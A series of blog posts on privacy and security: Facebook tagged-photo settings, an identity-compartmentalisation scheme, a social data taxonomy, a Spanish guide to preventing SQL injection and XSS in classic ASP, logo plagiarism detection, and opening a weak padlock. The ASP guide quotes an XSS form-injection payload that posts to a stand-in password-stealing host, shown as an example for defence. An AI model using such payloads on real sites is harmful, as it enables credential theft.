Understanding Facebook Tagged Photos Privacy

We discuss how to enhance the privacy of Facebook when facing users tagging you in third-party pictures.

To understand the tagged photos privacy features of Facebook we design a Facebook usage lab. Our laboratory includes three individuals who graciously volunteered to be part of the tests. Bob is in Alice's contact list because he is her lover and Chuck is in her contact list because he is her official couple. Chuck suspects that Alice is unfaithful but he needs evidence to attract Alice into a vortex of unhappiness and sorrow.

Each of the users respectively uploaded one picture: PhotoB, PhotoA and PhotoC. The critical photo is PhotoB, uploaded by Bob, where Alice is included.

In Facebook, a user can tag photos with names. If the name belongs to a contact of the user the tag is linked to other public photos of that contact. The privacy features of tagged photos are centered around:

a) who can view the photos published by user A and
b) who can view the photos where user B was tagged.

We will discuss briefly the scenario where Bob tags Alice in his photo, with the default configuration.
By default, Bob's photos are only visible by his friends, in this case Alice and not Chuck. But if Bob one day needs to share something and changes his profile privacy from "Only Friends" to "Friends of Friends" (Settings > Privacy > Profile > Profile) then Chuck will notice in his Facebook feed that Alice was tagged in a photo owned by Bob. This is due to the default photo tagged visibility configuration of Alice, i.e. "Only Friends" allows her to view the photos where she was tagged. If Alice changes her tagged photos settings to "Only Me" (Settings > Privacy > Profile > Photos Tagged of You > Customize... > Only Me) then Chuck will not see the critical PhotoB.

To search for photos and test the visibility you can use "photo_search.php".

http://www.facebook.com/photo_search.php?id=USER_NUMERICAL_ID

There you can view the photos "visible" by the user A who is logged right now. This photos can be from the user A profile, or from another user but tagged with the name of the user A whom numerical identification is USER_NUMERICAL_ID.

Join the privacy lab via Facebook (Alice, Bob and Chuck) or the Data Privacy Army if you want to contribute with scenarios or comments!

Social Rings: A Simple Method For Enhancing Privacy In Web 2.0 And Social Networks

Disclaimer: This post was written for the annoyingly paranoid.

If you are worried about your privacy but you don't want to be isolated in Internet then you may want to implement social rings. Here we will describe the simple method we devised for enabling a little privacy in web 2.0 and social networks. We design four privacy levels or social rings to access the web and contact people through social network services. Keep in mind, that as soon as other abstract communication layers don't provide any privacy, probably your privacy is invaded by your local ISP, government intelligence/security agency or employer.

This method includes human and automatic computer interactions. We have been testing it for about a year and provides a more clear understanding of privacy in the Internet, given the little effort of managing the different rings. It is designed to avoid phishing, spamming and optimized your mindshare/attention online, a limited resource.

• Social Ring 0 (The Circle Of Trust or The Social Circle): Include here close friends, trusted co-workers and trusted family members. Create an e-mail for this ring. Identify yourself with your complete name but don't include your complete name in the e-mail, you don't want people knowing your complete your name to deduce the e-mail. Use this e-mail only for human-human contacts, not for automatic subscriptions, the latter usually contains messages from people you don't trust. This email, not directly deducible from your complete name, will be the key/token (we will call it token0) to enter social ring 0, but assume that contacts in this ring know your complete name. Use token0 to create and account on you favorite social network service. Check that people can only contact you in this ring if they have token0. In Facebook for example you must not use your complete name, but you may want to be contacted with token0 in the people search queries. From example if your name is Alan Smithee you may use alans or as23 as privacy token0. Only people (or robots?) will enter this ring after physical contact or personal recommendation from an existing contact. You may subscribe to news feed system only in this feed systems allows anonymous subscriptions or followers. Twitter allows anonymous subscriptions via RSS feeds but following people in Twitter with your Twitter account is not anonymous.
  
• Social Ring 1 (The News/Nickname Ring): Here are included not so close friends, untrusted co-workers/family and automatic subscriptions/robots. Create an email with privacy token1, similarly as with ring 0 but now with a token completely uncorrelated to your complete name. Don't use your complete name anywhere within this ring (!), use a simple nickname, such as alan666 or morfeus. Using token1 you can subscribe to people and systems that only supports non-anonymous subscriptions such as Twitter. E-mail newsletters and lists are included in this ring because this qualifies as an interaction with an untrusted machine possibly aggregating content and spam from people you don't know. Don't use token1 for possible spammish subscriptions or people/social network systems suspected of being malicious. You may want to use your complete name in blogs and services associated with token1 but only for publishing content, not consuming.
• Social Ring 2 (Social Event Horizon): create a totally uncorrelated social key token2 for this ring. Use it for subscriptions/services you don't trust at this moment. You can probe suspicious services or people comfortably standing in this ring. Surely you will need an email for this ring.
• Social Ring 3 (The Anonymous Moors): anonymous polls, anonymous social comments in web forums, no credentials needed. As you can be approximately geographically located, you may want to used anonymous routers such as Tor to avoid geographical bans or censorships. Remember to don't use any ring 0-2 credentials in this ring.
  

Some improvements may include Social Ring -1 with an encrypted web vault for storing personal data such as financial information, other critical data and Social Ring 0-2 credentials.

You want to avoid scenarios were people/machines can't deduce token{n-1} from token{n} so that can elevate their social ring level.

Please comment any method bugs or possible improvements.

(Last photo courtesy of lois_15354.)

Another Categorization of Social Networking Data

Following Bruce Schneier post on social network data taxonomies I made my own categorization. You will observe that is not a taxonomy because data is not exclusively in one of the categories, that is, the categories are not disjoint. It is a categorization centered on data destination, places and people that can store it, access it and the use it. Schneier taxonomy is centered on trust levels I think.

1. Collected Data. Data collected by the service provider. Unless this data is encrypted on the client-side and stored this way on the server we assume it is plain text data accessible by the service provider. Usually includes profile and network data explicitly provided by the user, and click history implicitly provided. You can assume that everything you do and upload in the browser tab of the service is collected if the privacy policy of the service doesn't state it otherwise.
2. Public/Disclosed Data. Data that is published openly, such as complete name or e-mail. It can be useful for other people trying to locate you.
3. Social Data. Data that is openly shared with your trusted contacts. Unless these contacts are inside your circle of trust, they can't access it.
4. Monetized Data. Data that is actually used by the service provider to serve you personalized advertising. This category also includes data that can be sold anonymized or aggregated to third parties.
   

You can observe that in some services, such as web logs, all social data is public/disclosed. It is common nowdays, that the service provider collects all the data, so the public/disclosed data and the social data are included there. On the other side, a encrypted social network service could possibly assure a minimization of collected data. Obviously monetized data can only be extracted from some data collected from the provider. If the social data can be widely collected by other users infiltrating your social contact list they can build a dataset that can be turn into monetized data. Another example is Google's Social Graph effort, they are transforming part of your social data in services they can't access into public/disclosed data that fits better inside their business model.

Some ideas in this post are related to Alex Iskold post on attention silos.

Precauciones Básicas para Evitar Ataques Web en ASP

Repasamos algunos conceptos de seguridad web básicos y recorriendo la web comentamos algunas soluciones para evitar ataques en aplicaciones web desarrolladas con ASP.

Como toda falla de seguridad, la tecnología que se desarrolla antes de que se popularice la falla, es víctima segura de la misma. En el caso de ASP es así, recién en ASP .Net se toma conciencia de las fallas de seguridad habituales en SQL y JavaScript y se implementan medidas incluidas por defecto, por lo menos en las librerías.

Las principales fallas que afectan a ASP son las que afectan a la mayoría de las aplicaciones web, son de inyección de código JavaScript y código SQL dentro de los datos enviados a la aplicación. La inyección de código dentro de datos enviados a programas es una categoría central de fallas de seguridad. En el caso clásico de aplicaciones nativas se inyecta código máquina dentro de datos enviados a servidores programados en C/C++ o dentro de datos multimedia para ataques clientes web o correo programados también en C/C++.

En el caso de una falla de inyección SQL la ejecución de una sentencia SQL en el servidor puede ser afectada o desviada mediante datos provistos por el usuario. Usualmente al mezclarse la sentencia SQL en forma de string de caracteres con la entrada provista por el usuario/atacante, este último puede escapar de la sentencia SQL con algún tipo de caracter como comilla simple o doble y luego agregar SQL a la sentencia existente o ejecutar una sentencia distinta (por ejemplo con ";" en el MS SQL Server). Luego el impacto habitual es pasar alrededor la autenticación entrando como administrador al sistema o listando la lista de usuario, aunque también dependiendo de los permisos de la base de datos SQL se pueden llegar a modificar tablas de datos o ejecutar comandos de la consola de sistema [1].

Las inyecciones de JavaScript, también conocidas como XSS o Cross-site Scripting parecen mas inofensivas porque afectan en principio a los navegadores web cliente de los usuarios, pero aparte de servir para robar credenciales de los usuarios pueden servir para sobrecargar al servidor con peticiones. Se inyecta JavaScript en los datos y estos son reflejados en el HTML que se devuelve, entonces si la inyección se puede persistir o se puede reproducir con un URL (XSS de petición GET), entonces las víctimas pueden acceder al mismo y de ellas se podría eventualmente robar sus cookies de sesión. Para el caso de peticiones POST alcanza con dirigir a las víctimas al dominio "notanevilhacker.org" y de ahi andar el POST con el XSS al dominio "vulnerable.org" para robar credenciales [2].

En general la mejorar manera de evitar la inyecciones SQL es depurando la entrada de datos. Por ejemplo se puede solamente dejar pasar (lista blanca o white-listing) los datos alfanuméricos en ASP con el siguiente código [3]. En este caso se filtra el complemento alfanumérico con "^". Hay que incluir letras con acentos que se usan en el español posiblemente, que no están en este ejemplo. Destaquemos que siempre es preferible el white-listing antes que el black-listing, por que en el último caso se puede escapar algún caso no filtrado por la tangente, ergo, se nos escapa la tortuga de la seguridad por algun caso no cubierto.

'Crear un objeto expresion regular
Dim regEx
Set regEx = New RegExp

'Esta propiedad global le dice al moto de RegEx que busque TODAS las
'subcadenas, en vez de la primera aparicion. Tiene que ser true.
regEx.Global = true

'Nuestro patron dice que tenemos que buscar en el string... En este caso
'buscamos cosas que no sean alfanumericas...
regEx.Pattern = "[^0-9a-zA-Z]"

'Usamos la funcion de reemplazo de RegEx para limpiar el username. La funcion
'de reemplazo toma un string para buscar (usando el patron de arriba como criterio=
'y la string que va a reemplazarla.
'En este caso, queremos reemplazar con nada, porque los caracteres no
'alfanumericos son los que queremos quitar.
dim username
username = regEx.Replace(request.form("UserName"), "")

Para el caso de los XSS si es una entrada de usuario que incluye caracteres no alfanuméricos lo mejor es codificar la entrada para que sea interpretada como datos en el HTML de vuelta, y no como HTML en si mismo. En ASP la función que provee esta funcionalidad es "Server.HtmlEncode" [4].

Por ejemplo se reemplaza la entrada maliciosa:

</form>
<form method="POST"
action="www.hax0r.com/passwordstealer.asp">

Por:

</form><form
method="POST"
action="www.hax0r.com/passwordstealer.asp">

Podemos observar que si aparecen los dos tipos de vulnerabilidades juntas como el filtrado para evitar inyecciones SQL es mas restrictivo seguramente alcance con aplicar eso y no la codificación para HTML. Si ya fuimos víctimas de un ataque lo mejor es tratar de eliminar código remanente JavaScript malicioso en la base de datos [5].

Detecting Shameless Logo Plagiarism!

I guess that we must clarify language confusions here. As we are talking about intangible assets here, information, we use the words steal and theft only refering to the act of plagiarism. It is immoral when no reference to the original author is explicited then it is assumed that the copied logo is an original work of the graphic designed. No logo is completely original as particular features are always present in another logos but plagiarism is assumed when many features are present in more than one logo.

It's very funny to observe that to save money and time some companies copy (steal?) the iconographic logos from another companies. In some cases the small ones copy from the bigger ones and in other cases is the other way around.

I recommend to use the wonderful photo search engine called TinEye plus the Firefox TinEye plugin. In this case, is very clear that the photo similarity search of the service is a perfect fit for the detection of logo clones (thefts?).

These posts (part 1, part 2) written by a logo design company explain the details and techniques for shamelessly copying a complete logo or part of it. For example they show the similarities between the Sun Microsystems logo and the Columbia Sportswear logo. I tried to use TinEye to detect the Sun/Columbia similarities but failed.
In this article called Protecting Your Custom Company Logo Design's Copyright it is explained how to legally protect your logo, I guess is only useful when a explicit copy of your logo is made (and your logo is originally enough to be considered something that can be copied!).

An plagiarism example I detected with TinEye was the Kibon plagiarism (page 1, page 2). Kibon some years ago was an ice-cream brand, but the logo is also used by Olá, Good Humor and Wall's. Apparently these ice-cream brands are all owned by Unilever so they use the same logo in many places. But at least is not clear who design the logo. In site Brand's Of The World you can found the different logos: Olá (Portugal), Kibon (Brazil) and Wall's.
The TinEye approach did not work also for detecting one of my favorite plagiarisms: Livra (a prosumer web company from Argentina) versus CounterPath (a VoIP client software company).
We can conclude that plagiarism is usually accepted within an organisation because the organisation owns the copyright of the logo and can reuse and modify it without permission of the original graphic designer whether it works for the company or not.

Finally, swiss site Plagiat is completely devoted to plagiarism in it's various forms.

¡Equipo de Ganzuas Básico!

¡Me quería meter en el mundo de la seguridad física! Entonces me compré un equipo básico de lockpicking en la conferencia Ekoparty de la gente de TOOOL.

Como no tenía nada para abrir con el equipo (solo sirve para candados comunes, no para candados tipo palanca). Luego me compré un pequeño candado SilverShadow, 30 mm, para probar el equipo. Este candado es importado por Herralfer S.A. de China.

La sopresa fue que solamente tuve que la pequeña palanca para abrirlo ¡Este candado no provee ningún nivel de seguridad! ¡Solamente necesitás girar el mecanismo con algo! ¡Incluso funcionó con mi uña!

Miren las fotos con la palanca, algo de tensión alcanza.

Ahora una foto con mi uña abriendo el candado. ¡No hizo falta el equipo hoy!

La moraleja de hoy es que no importa que tan fuerte sea el metal del candado, si el mecanismo es pobre, entonces el candado no provee seguridad.

Probablemente voy a enviar una queja a la empresa que importa estos candados. Esta es la información si quieren hacer lo mismo:

Herralfer S.A.
www.herralfer.com.ar
CUIT 30-66108409-6
Carrasco 729/31 (C1407)
Buenos Aires - Argentina
Telefax: (5411) 4139-8978
E-mail: info@herralfer.com.ar
FABRICADO EN CHINA

Basic Lockpicking Kit!

I wanted to introduce myself into the world of physical security! So I bought a basic lockpicking kit at Ekoparty from the guys of TOOOL.

I didn't have anything that can be opened with the kit (it is only useful for classic locks, not lever locks). Then I bought a SilverShadow small lock, 30 mm, to test the kit. This lock is imported by Herralfer S.A. from China.

The surprise is that I only have to use the small lever to open it. This lock don't provide any security at all! You just need to turn the mechanism with something! It even worked with my nail!

Check the photos with the lever, some tension is enough.

Now a photo of my nail opening the lock. No need for the kit today!

Today's moral is that it does not matter the strength of the lock metal, if the mechanism is poor then the lock does not provide security.

I will probably send a complain to the company importing these locks. This is the information if you want to do the same:

Herralfer S.A.
www.herralfer.com.ar
CUIT 30-66108409-6
Carrasco 729/31 (C1407)
Buenos Aires - Argentina
Telefax: (5411) 4139-8978
E-mail: info@herralfer.com.ar
FABRICADO EN CHINA